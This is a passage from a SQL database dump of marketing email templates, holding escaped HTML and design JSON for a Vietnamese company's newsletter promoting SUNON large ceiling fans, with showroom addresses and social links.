0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:40px 10px 10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:234px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"234\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:234px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 15px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 15px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/www.linkedin.com\\/company\\/hogiaphat\\/\\\" title=\\\"LinkedIn\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/linkedin.png\\\" alt=\\\"LinkedIn\\\" title=\\\"LinkedIn\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 15px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 15px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/twitter.com\\/hgpco\\\" title=\\\"Twitter\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/twitter.png\\\" alt=\\\"Twitter\\\" title=\\\"Twitter\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 15px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 15px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/www.instagram.com\\/quatcaocap\\/\\\" title=\\\"Instagram\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/instagram.png\\\" alt=\\\"Instagram\\\" title=\\\"Instagram\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 15px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 15px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/www.youtube.com\\/channel\\/UCKlFoDwgsjdlMD9gxwQYPVw\\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/www.facebook.com\\/bigfans.vn\\\" title=\\\"Facebook\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/facebook.png\\\" alt=\\\"Facebook\\\" title=\\\"Facebook\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #333333; line-height: 180%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px; font-family: inherit;\\\"><strong><span style=\\\"line-height: 21.6px;\\\">GI\\u1ea2I PH\\u00c1P L\\u00c0M M\\u00c1T TO\\u00c0N DI\\u1ec6N KH\\u00d4NG GIAN NH\\u00c0 \\u1ede - V\\u0102N PH\\u00d2NG - C\\u00d4NG NGHI\\u1ec6P<\\/span><\\/strong><\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px; font-family: inherit;\\\"><strong>SR THU DUC: <\\/strong>184 Tran Luu, An Phu, Thu Duc, HCM<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px; font-family: inherit;\\\"><strong>SR DISTRICT 7: <\\/strong>812 Happy Valley, Nguyen Van Linh, Tan Phong, District 7, HCM<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px; font-family: inherit;\\\">WIT.\\u00a0 All rights reserved. <\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px; font-family: inherit;\\\">Tax: 0315778682<\\/span><br \\/><span style=\\\"font-size: 12px; line-height: 21.6px; font-family: inherit;\\\"><a rel=\\\"noopener\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\" target=\\\"_blank\\\"><span style=\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\">Manage Preferences<\\/span> <\\/a>| <a rel=\\\"noopener\\\" href=\\\"https:\\/\\/haiku.hogiaphat.vn\\\" target=\\\"_blank\\\"><span style=\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\">View in browser<\\/span>\\u00a0<\\/a><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"');
INSERT INTO `tblma_emails` (`id`, `name`, `type`, `category`, `segment`, `published`, `language`, `description`, `addedfrom`, `dateadded`, `color`, `subject`, `email_template`, `from_name`, `from_address`, `reply_to_address`, `bcc_address`, `attachment`, `data_design`, `data_html`) VALUES
(5, 'Quạt Trần SUNON - Giải pháp làm mát toàn diện không gian rộng/lớn', '', 9, 0, 1, 'vietnamese', '', 1, '2023-02-23 21:01:36', '#03862e', 'Quạt Trần SUNON - Giải pháp làm mát toàn diện không gian rộng/lớn', 2, 'Tổ chức đào tạo WIT', 'no-reply@hogiaphat.vn', 'sale@hogiaphat.vn', 'cskh@hogiaphat.vn', '2', '\"{\\\"counters\\\":{\\\"u_row\\\":17,\\\"u_column\\\":21,\\\"u_content_text\\\":13,\\\"u_content_image\\\":8,\\\"u_content_button\\\":9,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":10,\\\"u_content_text_deprecated\\\":5,\\\"u_content_heading\\\":5},\\\"body\\\":{\\\"id\\\":\\\"0u7zmWfe6N\\\",\\\"rows\\\":[{\\\"id\\\":\\\"mzyaBaFj3Q\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"U5J6RuT_G3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"PU1AcFTaVA\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 5px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677161242918-sunon_logo.png\\\",\\\"width\\\":1366,\\\"height\\\":270,\\\"autoWidth\\\":false,\\\"maxWidth\\\":\\\"32%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"1Qjrk0qbzm\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677161813458-Taiwan_Excellence-300.png\\\",\\\"width\\\":300,\\\"height\\\":404,\\\"autoWidth\\\":false,\\\"maxWidth\\\":\\\"13%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_3\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"IujIkibZVI\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px 15px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Lato\\\",\\\"value\\\":\\\"\'Lato\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#302828\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 30.8px; font-size: 22px;\\\\\\\">Qu\\u1ea1t treo tr\\u1ea7n c\\u00e1nh l\\u1edbn HVLS - s\\u1eed d\\u1ee5ng trong kh\\u00f4ng gian nh\\u00e0 \\u1edf, v\\u0103n ph\\u00f2ng, nh\\u00e0 m\\u00e1y c\\u00f4ng nghi\\u1ec7p<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"R4HsSwPE9M\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"NbC6bNPx-L\\\",\\\"contents\\\":[{\\\"id\\\":\\\"hwB_5FeW6h\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677162634107-sunon_ps1_.jpg\\\",\\\"width\\\":626,\\\"height\\\":626},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_2\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"jzF8GQBO8Z\\\",\\\"contents\\\":[{\\\"id\\\":\\\"j27y9vBFGq\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Andale Mono\\\",\\\"value\\\":\\\"andale mono,times\\\",\\\"url\\\":\\\"\\\",\\\"defaultFont\\\":true},\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#1f1c1a\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 20px; line-height: 28px; font-family: impact, chicago;\\\\\\\">Overhead Residential Fans<br \\/><\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"muWAhW9WmR\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h3\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Crimson Text\\\",\\\"value\\\":\\\"\'Crimson Text\',serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Crimson+Text:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontSize\\\":\\\"15px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_3\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u1ee8ng d\\u1ee5ng l\\u1eafp \\u0111\\u1eb7t trong v\\u0103n ph\\u00f2ng, nh\\u00e0 \\u1edf:\\\"}},{\\\"id\\\":\\\"K11q7oJt-y\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Lato\\\",\\\"value\\\":\\\"\'Lato\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"100%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 100%;\\\\\\\"><span style=\\\\\\\"font-size: 14px; line-height: 14px; font-family: inherit;\\\\\\\">C\\u0103n tin, tr\\u01b0\\u1eddng h\\u1ecdc, b\\u1ec7nh vi\\u1ec7n<br \\/><\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 100%;\\\\\\\"><span style=\\\\\\\"font-size: 14px; line-height: 14px; font-family: inherit;\\\\\\\">S\\u1ea3nh c\\u00f4ng ty, v\\u0103n ph\\u00f2ng, nh\\u00e0 \\u1edf<br \\/><\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 100%;\\\\\\\"><span style=\\\\\\\"font-size: 14px; line-height: 14px; font-family: inherit;\\\\\\\">Qu\\u00e1n cafe, nh\\u00e0 h\\u00e0ng, qu\\u00e1n \\u0103n<\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 100%;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 14px; font-size: 14px;\\\\\\\">Garage \\u00f4t\\u00f4, x\\u01b0\\u1edfng b\\u1ea3o tr\\u00ec...<\\/span><\\/p>\\\",\\\"hideMobile\\\":false,\\\"_override\\\":{\\\"mobile\\\":{\\\"color\\\":\\\"#236fa1\\\"}}},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"mUlLxEhdYK\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-canh-lon-powerful-s1\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#079442\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":false,\\\"width\\\":\\\"100%\\\"},\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"1px\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"1px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"1px\\\"},\\\"borderRadius\\\":\\\"1px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_6\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM TH\\u00caM - SUNON PS1<br \\/><\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":293,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"UCl3NN0-Rk\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"fqRXi92NF_\\\",\\\"contents\\\":[{\\\"id\\\":\\\"g2IIONyE-Z\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\